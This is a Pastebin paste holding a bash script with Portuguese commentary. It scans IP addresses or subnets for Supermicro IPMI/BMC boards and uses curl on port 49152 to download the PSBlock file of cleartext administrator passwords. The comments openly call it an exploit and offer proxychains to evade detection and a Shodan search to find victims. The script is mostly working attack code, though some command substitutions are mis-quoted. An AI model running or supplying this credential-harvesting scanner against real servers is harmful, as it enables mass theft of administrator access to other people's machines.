Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/bin/bash
- # Supermicro IPMI/BMC Cleartext Password Scanner v20140622
- # Seguranca da Informacao VB/CG
- # Usage: sh supermicro_scan.sh <CIDR|IP|showdan> [proxy]
- #
- # ABOUT:
- # Supermicro's implementation of IPMI/BMC allows remote, unauthenticated attackers to
- # request the file PSBlock via port 49152. This plain text password file contains IPMI
- # username and password information. This script allows users to scan their networks
- # check for vulnerable systems that require patching.
- #
- # Como Utilizar:
- # ./supermicro_scan.sh 74.200.8.237 -- Single host scan
- # ./supermicro_scan.sh 74.200.0.0/16 proxy -- Subnet scan with proxy
- # ./supermicro_scan.sh showdan -- Search for vulnerable servers on ShowdanHQ
- #
- /*
- Scanner de Falhas em Servidores Supermicro IPMI/BMC
- Como sabemos há poucos dias foi descoberta uma falha que expõe mais de 32 mil senhas administrativas dos servidores que utilizam a motherboard da Supermicro, estas senhas estão expostas com acesso pela porta 49152.
- Hoje trago um exploit capas de encontrar estas maquinas vulnerável.
- Este script automatiza a exploração da vulnerabilidade que expõe as senhas em formato texto destas maquinas.
- Esta ferramenta pode verificar sub-redes, hosts individual e ainda inclui a opção de utilizar proxy dificultando a detecção do atacante e não bastando também possui a opção de pesquisa da falha via SHODANHQ
- Basta copiar o codigo abaixo e colar em um arquivo com o nome supermicro_scan.sh
- Lembrando Este script é para utilizadores de LINUX.
- FONTE: http://virusbrasil.com.br/?p=106
- */
- clear
- echo "--==== Seguranca da Informacao VB/CG"
- echo "--==== Supermicro IPMI Cleartext Password Scanner"
- echo ""
- UNICORNSCAN='which unicornscan'
- CURL='which curl'
- PROXYCHAINS='which proxychains'
- TARGET=$1
- PROXY=$2
- if [ "$UNICORNSCAN" == "" ]; then
- echo "--==== Unicornscan nao instalado Saindo …"
- exit
- fi
- if [ "$PROXYCHAINS" == "" ]; then
- echo "--==== Proxychains nao instalado varredura Continuando sem suporte a proxy…"
- exit
- fi
- if [ "$CURL" == "" ]; then
- echo "--==== Curl nao esta instalado! Saindo …"
- exit
- fi
- if [ -z "$1" ]; then
- echo "--==== Usage: $0 <CIDR|IP> [proxy]"
- exit
- fi
- if [ $TARGET == "shodan" ]; then
- # SCAN USING SHODANHQ SEARCH
- echo "Buscando ShowdanHQ…"
- iceweasel http://www.shodanhq.com/search?q=Content-Length%3D3269 &
- exit
- fi
- if [ "$PROXY" = "proxy" ]; then
- #PROXY ENABLED
- echo "--==== Scanning via proxy…"
- # SCAN FOR THE DEFAULT FILES AND PORTS
- for a in 'unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}''; do
- echo "--==== Extraindo Usuario e senha from $a"
- echo "--==== Sending GET http://$a:49152/PSBlock"
- proxychains curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
- done
- exit
- else
- # NO PROXY
- echo "--==== Scanning via conexao direta…"
- # SCAN FOR THE DEFAULT FILES AND PORTS
- for a in 'unicornscan -p 49152 $TARGET 2>/dev/null | awk '{print $5}''; do
- echo "--==== Extraindo usuario e senha from $a"
- echo "--==== Sending GET http://$a:49152/PSBlock"
- curl http://$a:49152/PSBlock -m 3 --retry 1 -f -# | strings
- done
- exit
- fi
- echo ""
- echo "--==== Scan Completo!"
- exit
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement